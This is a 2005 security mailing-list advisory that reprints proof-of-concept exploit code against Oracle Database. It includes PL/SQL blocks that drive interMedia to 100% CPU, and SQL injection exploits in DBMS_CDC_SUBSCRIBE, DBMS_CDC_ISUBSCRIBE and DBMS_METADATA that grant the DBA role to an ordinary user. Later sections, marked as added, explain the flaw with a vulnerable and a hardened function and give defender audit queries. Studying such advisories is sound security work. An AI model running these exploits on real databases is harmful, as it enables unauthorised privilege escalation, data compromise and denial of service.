[EXPL] Multiple Exploit Codes for Oracle (interMedia, DBMS_CDC_SUBSCRIBE, DBMS_CDC_ISUBSCRIBE and DBMS_METADATA)

From: SecuriTeam (support_at_securiteam.com)
Date: 04/21/05

    To: list@securiteam.com
    Date: 21 Apr 2005 16:40:04 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

    Multiple Exploit Codes for Oracle (interMedia, DBMS_CDC_SUBSCRIBE, DBMS_CDC_ISUBSCRIBE and DBMS_METADATA)
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous articles, Oracle interMedia DoS
    <http://www.securiteam.com/securitynews/5YP0S0AFGK.html>, Multiple SQL
    Injection Vulnerabilities in DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE
    Packages <http://www.securiteam.com/securitynews/5VP0P0AFGM.html> and
    Multiple SQL Injection Vulnerabilities in DBMS_METADATA Package
    <http://www.securiteam.com/securitynews/5UP0O0AFGO.html>, multiple
    vulnerabilities have been discovered in Oracle. The following exploit code
    can be used to test your Oracle installation for the mentioned
    vulnerabilities.

    DETAILS

    Exploit for Oracle interMedia DoS:
    /*
       Argeniss - Information Security
       http://www.argeniss.com
       info>at<argeniss>dot<com

       You think you are secure because you are running the unbreakable
    Oracle, you think you are secure because you are up to date with patches,
    you think you are secure because etc., etc......
       You are wrong, Oracle software is so buggy that it can be owned in five
    seconds bypassing all protection mechanisms. Think how much money you will
    lose when your corporate data is compromised.
       There are still dozens of unpatched vulnerabilities. The best
    protection is eliminating vulnerabilities.
       Join AVI service now and be safe http://www.argeniss.com/services.html
       Find out the special offer for Oracle vulnerability pack, it includes
    all unpatched Oracle vulnerability information with workaround scripts
    ready to apply.

       Proof of concept exploit code for the Denial of Service vulnerability
    in Oracle InterMedia.
       http://www.argeniss.com/research.html
       By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

      These exploits make the Oracle process consume 100% CPU.
    */

    -- Exploit 1: Explicitly setting two null bytes to localData property
    DECLARE
      Image ORDSYS.ORDImage;
    BEGIN
      Image := ORDSYS.ORDImage.init();
      Image.source.localData := TO_BLOB(HEXTORAW('0000'));
      Image.setProperties;
    END;
    /

    -- Exploit 2: Loading from filesystem
    DECLARE
      Image ORDSYS.ORDImage;
    BEGIN
      Image := ORDSYS.ORDImage.init('file', 'MEDIA_DIR', 'file_with_two_null_bytes.jpg');
      Image.setProperties;
    END;
    /

    -- Exploit 3: Loading from web
    DECLARE
      Image ORDSYS.ORDImage;
    BEGIN
      Image := ORDSYS.ORDImage.init('HTTP', 'www.someserver.com/', 'file_with_two_null_bytes.jpg');
      Image.setProperties;
    END;
    /

    -- Exploit 4: Explicitly setting two null bytes to localData property of ORDDoc type.
    DECLARE
      Doc ORDSYS.ORDDoc;
      R RAW(30000);
    BEGIN
      Doc := ORDSYS.ORDDoc.init();
      Doc.source.localData := TO_BLOB(HEXTORAW('0000'));
      Doc.setProperties (R, FALSE);
    END;
    /

    Exploit for DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE packages:
    /*
       Argeniss - Information Security
       http://www.argeniss.com
       info>at<argeniss>dot<com


       Proof of concept exploit code for the SQL Injection vulnerability in Oracle
       Database Server standard packages SYS.DBMS_CDC_SUBSCRIBE and
       SYS.DBMS_CDC_ISUBSCRIBE (parameter SUBSCRIPTION_NAME).
       http://www.argeniss.com/research.html
       By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

       This exploit grants the DBA role to the user SCOTT.
       Required privileges: Database user with privileges to create or modify functions.
       For more information on SQL injection issues in Oracle and how this exploit works
       see the Advanced SQL Injection in Oracle databases presentation available at
       http://www.argeniss.com/research.html
    */

    -- First we create the function to be injected and executed as the SYS user.
    CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
     authid current_user as
     pragma autonomous_transaction;
    BEGIN
      EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
      COMMIT;
      RETURN '';
    END;
    /

    -- Inject the function in the vulnerable procedure
    BEGIN
      SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACKER_FUNC()||''');
    END;
    /

    Exploit for DBMS_METADATA package:
    /*
       Argeniss - Information Security
       http://www.argeniss.com
       info>at<argeniss>dot<com


       Proof of concept exploit code for the SQL Injection vulnerability in Oracle
       Database Server standard package DBMS_METADATA.
       http://www.argeniss.com/research.html
       By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

       This exploit grants the DBA role to the user SCOTT.
       Required privileges: Database user with privileges to create or modify functions.
       For more information on SQL injection issues in Oracle and how this exploit works
       see the Advanced SQL Injection in Oracle databases presentation available at
       http://www.argeniss.com/research.html
    */

    -- First we create the function to be injected and executed as the SYS user.
    CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
     authid current_user as
     pragma autonomous_transaction;
    BEGIN
      EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
      COMMIT;
      RETURN '';
    END;
    /

    -- Inject the function in the vulnerable procedure
    SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACKER_FUNC()||''','') FROM dual;
    /
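    Both SQL injection PoCs above exploit the same flaw class: a caller-supplied string is concatenated into dynamic SQL inside a definer's-rights SYS package, so the injected ATTACKER_FUNC() call is evaluated with SYS privileges. The following added example (not part of the advisory or of Argeniss's code) shows that pattern in a hypothetical VULN_LOOKUP function beside a hardened SAFE_LOOKUP; the SUBS table and both functions are assumptions, and DBMS_ASSERT is assumed to be available on the target release.

```sql
-- Hypothetical definer's-rights function in a privileged schema that mirrors
-- the flaw: the caller-supplied name is concatenated straight into dynamic SQL.
CREATE OR REPLACE FUNCTION vuln_lookup (p_subscription_name IN VARCHAR2)
  RETURN PLS_INTEGER AUTHID DEFINER
AS
  v_count PLS_INTEGER;
BEGIN
  -- Input '||SCOTT.ATTACKER_FUNC()||' turns the statement into
  --   SELECT COUNT(*) FROM subs WHERE name = ''||SCOTT.ATTACKER_FUNC()||''
  -- so the function is parsed as a SQL expression and evaluated while the
  -- statement runs with the owner's privileges (SYS in the real packages).
  -- AUTHID CURRENT_USER on the injected function resolves to that owner, and
  -- PRAGMA AUTONOMOUS_TRANSACTION lets it issue DDL from inside a query.
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM subs WHERE name = ''' || p_subscription_name || ''''
    INTO v_count;
  RETURN v_count;
END;
/

-- Hardened form: validate the identifier, then pass it as a bind variable.
CREATE OR REPLACE FUNCTION safe_lookup (p_subscription_name IN VARCHAR2)
  RETURN PLS_INTEGER AUTHID DEFINER
AS
  v_count PLS_INTEGER;
  v_name  VARCHAR2(128);
BEGIN
  -- DBMS_ASSERT.SIMPLE_SQL_NAME raises ORA-44003 for anything that is not a
  -- plain SQL identifier, so '||SCOTT.ATTACKER_FUNC()||' is rejected up front.
  v_name := DBMS_ASSERT.SIMPLE_SQL_NAME(p_subscription_name);
  -- A bind is never parsed as SQL text: even without the check above, the
  -- payload would only be compared as a string literal and no function runs.
  EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM subs WHERE name = :n'
    INTO v_count USING v_name;
  RETURN v_count;
END;
/
```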

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:cesarc56@yahoo.com> Cesar.
    The original article can be found at:
    <http://www.argeniss.com/research.html>
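    Added defender checks (not from the advisory) that a DBA can run from a privileged account to gauge exposure to the exploits above and to look for their footprint; the list of expected DBA accounts is a constructed placeholder, and the audit query only returns rows where statement auditing of grants is enabled.

```sql
-- 1. Who can reach the affected entry points? An EXECUTE grant to PUBLIC
--    means any account that can also create a function can try the injection.
SELECT grantee, owner, table_name, privilege
  FROM dba_tab_privs
 WHERE owner IN ('SYS', 'ORDSYS')
   AND table_name IN ('DBMS_CDC_SUBSCRIBE', 'DBMS_CDC_ISUBSCRIBE',
                      'DBMS_METADATA', 'ORDIMAGE', 'ORDDOC')
   AND privilege = 'EXECUTE'
 ORDER BY table_name, grantee;

-- 2. Accounts that meet the PoC's stated prerequisite (create/modify functions).
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE PROCEDURE', 'CREATE ANY PROCEDURE')
 ORDER BY grantee;

-- 3. Post-exploitation indicator: DBA held by an account outside the expected
--    set (placeholder list; substitute the accounts that should hold it).
SELECT grantee, granted_role, admin_option
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
   AND grantee NOT IN ('SYS', 'SYSTEM')
 ORDER BY grantee;

-- 4. Stored code in non-system schemas that issues GRANT through dynamic SQL,
--    the shape of ATTACKER_FUNC (matches only when both appear on one line).
SELECT owner, name, type, line, text
  FROM dba_source
 WHERE type IN ('FUNCTION', 'PROCEDURE', 'PACKAGE BODY')
   AND UPPER(text) LIKE '%EXECUTE IMMEDIATE%'
   AND UPPER(text) LIKE '%GRANT%'
   AND owner NOT IN ('SYS', 'SYSTEM')
 ORDER BY owner, name, line;

-- 5. Recent grant activity in the audit trail (requires auditing of grants).
SELECT timestamp, username, obj_name, action_name
  FROM dba_audit_trail
 WHERE action_name LIKE 'GRANT%'
   AND timestamp > SYSDATE - 7
 ORDER BY timestamp DESC;
```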
